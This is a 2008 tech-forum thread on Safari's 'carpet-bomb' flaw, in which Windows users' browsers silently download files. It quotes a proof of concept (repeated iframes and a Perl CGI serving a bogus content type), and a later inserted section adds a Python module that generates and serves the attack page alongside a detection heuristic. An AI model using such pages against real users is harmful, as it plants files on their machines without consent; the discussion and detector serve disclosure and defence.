Post subject: Apple's carpet-bomb Safari flaw can wreak havoc on Windows    Posted: Wed Jun 11, 2008 8:07 pm

Joined
Wed Jun 11, 2008 7:27 pm

Posts
140
A researcher has created a proof-of-concept site that graphically demonstrates the risk Windows users face when using Apple's Safari browser.
Microsoft's security team already warned that a "blended threat" was so serious that Windows users should curtail their use of Safari until a security patch is available. This blog post from researcher Liu Die Yu makes it clear the warning was by no means overstated.

Clicking on this link with Safari using default settings automatically downloads a booby-trapped file onto a Windows user's desktop with no prompting. The next time the user opens Internet Explorer, the force-fed file automatically causes the notepad.exe application to launch and open a non-existent file. Of course, miscreants could choose far more nefarious code.

When informed that its browser downloads files with no prompting, Apple said it may get around to changing this behavior at some point. In other words, this is no big deal from a security perspective, so let's all move on. This demo suggests otherwise.

source: neowin.net


Posted: Wed Jun 11, 2008 8:21 pm

Joined
Sat Feb 24, 2007 4:14 pm

Posts
6612

Location
United Kingdom

Favourite OS
Server 2012 R2
The thing with this, from what I heard, is that neither can completely fix it without the other. The flaw is in both Safari and Windows: small holes in both that normally wouldn't be exploitable take effect when used in conjunction.

_________________
BuildFeed - the ultimate collaborative NT build list - Windows Longhorn - a look at a defining Microsoft project


Posted: Tue Jun 17, 2008 6:29 pm

Joined
Wed Jun 11, 2008 7:27 pm

Posts
140
Well, it's another reason not to use Safari on Windows.


Posted: Tue Jun 17, 2008 8:11 pm

Joined
Fri Sep 01, 2006 10:04 pm

Posts
1022

Location
The Ephemeral between existence and non-existence: AKA "being"

Favourite OS
Rhapsody, BeOS
The only Windows users of Safari are web developers...
What is the flaw?

_________________
Part Time Troll - HPC Enthusiast - Spelling Master - Old Fart


Posted: Wed Jun 18, 2008 5:08 am

Joined
Fri Aug 18, 2006 12:05 pm

Posts
698

Location
Or-stray-liagh
[quote=http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html]
Assume you visit a malicious site, http://malicious.example.com/, that serves the following HTML:

<HTML>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
...
...
...
...
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
</HTML>

Now assume that http://malicious.example.com/cgi-bin/carpet_bomb.cgi is the following:

#!/usr/bin/perl
print "Content-type: blah/blah\n\n"

Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served.
[/quote]


Such simple exploit code o.O

And of course, Apple is being all arrogant and saying it's a feature not a bug. They said they will consider an "ask before downloading" checkbox in the next version of Safari.

_________________
pr0gram the pr0grammer
BetaArchive retiree | OSBA Expat
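The carpet-bomb mechanics quoted in this post, and the "downloads with no prompting" behaviour the first post describes, as an added example. This is my own reconstruction, not code from the original post, from dhanjani.com or from the linked demo. The host name malicious.example.com and the /cgi-bin/carpet_bomb.cgi path come from the quote; the 50-frame count, the blah/blah body, the carpet_bomb_score heuristic and its threshold are my assumptions, and nothing here touches the network unless serve() is called.

```python
"""Carpet-bomb demo reconstructed from the quoted write-up, plus a
defender-side heuristic. Added example, not the original author's code."""
from collections import Counter
from html.parser import HTMLParser
from http.server import BaseHTTPRequestHandler, HTTPServer

ENDPOINT = "/cgi-bin/carpet_bomb.cgi"   # path from the quoted write-up
BOGUS_TYPE = "blah/blah"                 # the unrenderable MIME type it used


def carpet_bomb_page(host: str, count: int) -> str:
    """Build the attacker page: `count` iframes all pointing at the same
    unrenderable resource. Each iframe is a separate fetch, so a browser
    that silently saves unknown content types writes `count` files."""
    frame = f'<iframe id="frame" src="http://{host}{ENDPOINT}"></iframe>'
    return "<HTML>\n" + "\n".join([frame] * count) + "\n</HTML>\n"


def bogus_response():
    """What the CGI returns: a body under a MIME type no browser renders.
    Safari 3.1 on Windows treated this as 'save to Desktop, do not ask'.
    Body text is constructed for the demo."""
    body = b"not really a document\n"
    headers = [("Content-Type", BOGUS_TYPE), ("Content-Length", str(len(body)))]
    return 200, headers, body


class _FrameCounter(HTMLParser):
    """Count iframe src values in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = Counter()

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            src = dict(attrs).get("src")
            if src:
                self.srcs[src] += 1


def carpet_bomb_score(html: str, threshold: int = 5):
    """Defender-side heuristic (my assumption, not from the page): flag a
    page when many iframes point at one and the same URL. Legitimate pages
    rarely embed the identical resource dozens of times; a carpet bomb does
    exactly that. Returns (is_suspicious, most_repeated_src, repeat_count)."""
    parser = _FrameCounter()
    parser.feed(html)
    if not parser.srcs:
        return False, None, 0
    src, n = parser.srcs.most_common(1)[0]
    return n >= threshold, src, n


class _Handler(BaseHTTPRequestHandler):
    """Serves the index page on any path and the bogus body on ENDPOINT."""

    def do_GET(self):
        if self.path == ENDPOINT:
            status, headers, body = bogus_response()
        else:
            host = self.headers.get("Host", "localhost")
            body = carpet_bomb_page(host, 50).encode()
            status = 200
            headers = [("Content-Type", "text/html"),
                       ("Content-Length", str(len(body)))]
        self.send_response(status)
        for name, value in headers:
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(body)


def serve(port: int = 8000):
    """Run the demo on loopback. Only meaningful against an isolated lab VM
    with a Safari 3.1-era Windows build; current browsers prompt or block."""
    HTTPServer(("127.0.0.1", port), _Handler).serve_forever()


if __name__ == "__main__":
    page = carpet_bomb_page("malicious.example.com", 50)
    print(carpet_bomb_score(page))
```

Running the module prints the heuristic's verdict on the generated page; carpet_bomb_score can equally be fed a page captured from a proxy log. The server side is deliberately trivial, which is the whole point of the thread: the client decides to write to disk, so the fix has to be in the browser's download policy, not in anything the server does.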


Powered by phpBB® Forum Software © phpBB Group

Copyright © 2006-2018